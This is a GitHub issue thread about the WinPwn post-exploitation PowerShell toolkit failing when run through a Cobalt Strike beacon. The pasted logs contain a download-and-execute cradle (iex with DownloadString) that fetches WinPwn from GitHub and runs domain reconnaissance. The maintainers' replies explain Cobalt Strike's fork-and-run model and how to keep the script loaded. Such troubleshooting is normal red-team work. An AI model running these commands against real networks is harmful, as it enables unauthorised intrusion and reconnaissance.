### ISSUE TITLE
in cobalt strike !!!

### ISSUE THREAD

**Issue by majid-derkaoui** [S3cur3Th1sSh1t/WinPwn#35]
beacon> powershell WinPwn -noninteractive -consoleoutput -DomainRecon
[*] Tasked beacon to run: WinPwn -noninteractive -consoleoutput -DomainRecon
[+] host called home, sent: 405 bytes
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S="Error">Exception calling "DownloadString" with "1" argument(s): "The server committed a protocol violation. _x000D__x000A_</S><S S="Error">Section=ResponseStatusLine"_x000D__x000A_</S><S S="Error">At line:1 char:1_x000D__x000A_</S><S S="Error">+ IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43496 ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error">    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException_x000D__x000A_</S><S S="Error">    + FullyQualifiedErrorId : WebException_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S><Obj S="progress" RefId="1"><TNRef RefId="0" /><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="2"><TNRef RefId="0" /><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S="Error">WinPwn : The term 'WinPwn' is not recognized as the name of a cmdlet, function, script file, or operable program. _x000D__x000A_</S><S S="Error">Check the spelling of the name, or if a path was included, verify that the path is correct and try again._x000D__x000A_</S><S S="Error">At line:1 char:75_x000D__x000A_</S><S S="Error">+ ... .Webclient).DownloadString('http://127.0.0.1:43496/'); WinPwn -nonint ..._x000D__x000A_</S><S S="Error">+                                                            ~~~~~~_x000D__x000A_</S><S S="Error">    + CategoryInfo          : ObjectNotFound: (WinPwn:String) [], CommandNotFoundException_x000D__x000A_</S><S S="Error">    + FullyQualifiedErrorId : CommandNotFoundException_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>

**Comment by S3cur3Th1sSh1t** [comment]
Did you import the offline or online version here? If you were using the offline version I assume that the file is too big and could not be loaded correctly.

This error message at least indicates, that the function from the script is not known. So it’s most likely not loaded correctly:


The term 'WinPwn' is not recognized as the name of a cmdlet, function, script file, or operable program.

**Comment by majid-derkaoui** [comment]
I Used this command
beacon> powershell iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
[*] Tasked beacon to run: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
[+] host called home, sent: 387 bytes
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
Please give me an example to use

**Comment by LuemmelSec** [comment]
I can see it is talking about protocol issues.
Did you turn on tls 1.2 via powershell before?
Can you load other tooling from github?
Maybe something flagging WinPwn?

**Comment by S3cur3Th1sSh1t** [comment]
This is another problem. It’s a problem with your cobalt strike handling. 

Cobalt strike spawns a new process for each command you’re using via “powershell” module and pipes the output into a named pipe. 

So if you issue your Iex command it will succeed in a new process , but the process will be killed and therefore WinPwn is not loaded anymore. 

Cobalt strike uses fork and run as principle. You should read its docs ;-)

to get this working you need to use other cobalt strike modules to load it first and issue the command afterwards. Or as alternative modify WinPwn so that at the very end the whole script is run with noninteractive parameters and so on. With the “Powershell” module you have only one shot. 

As this is not a WinPwn related issue I’ll still close this here for now. If you got further questions you can still ask here of course.
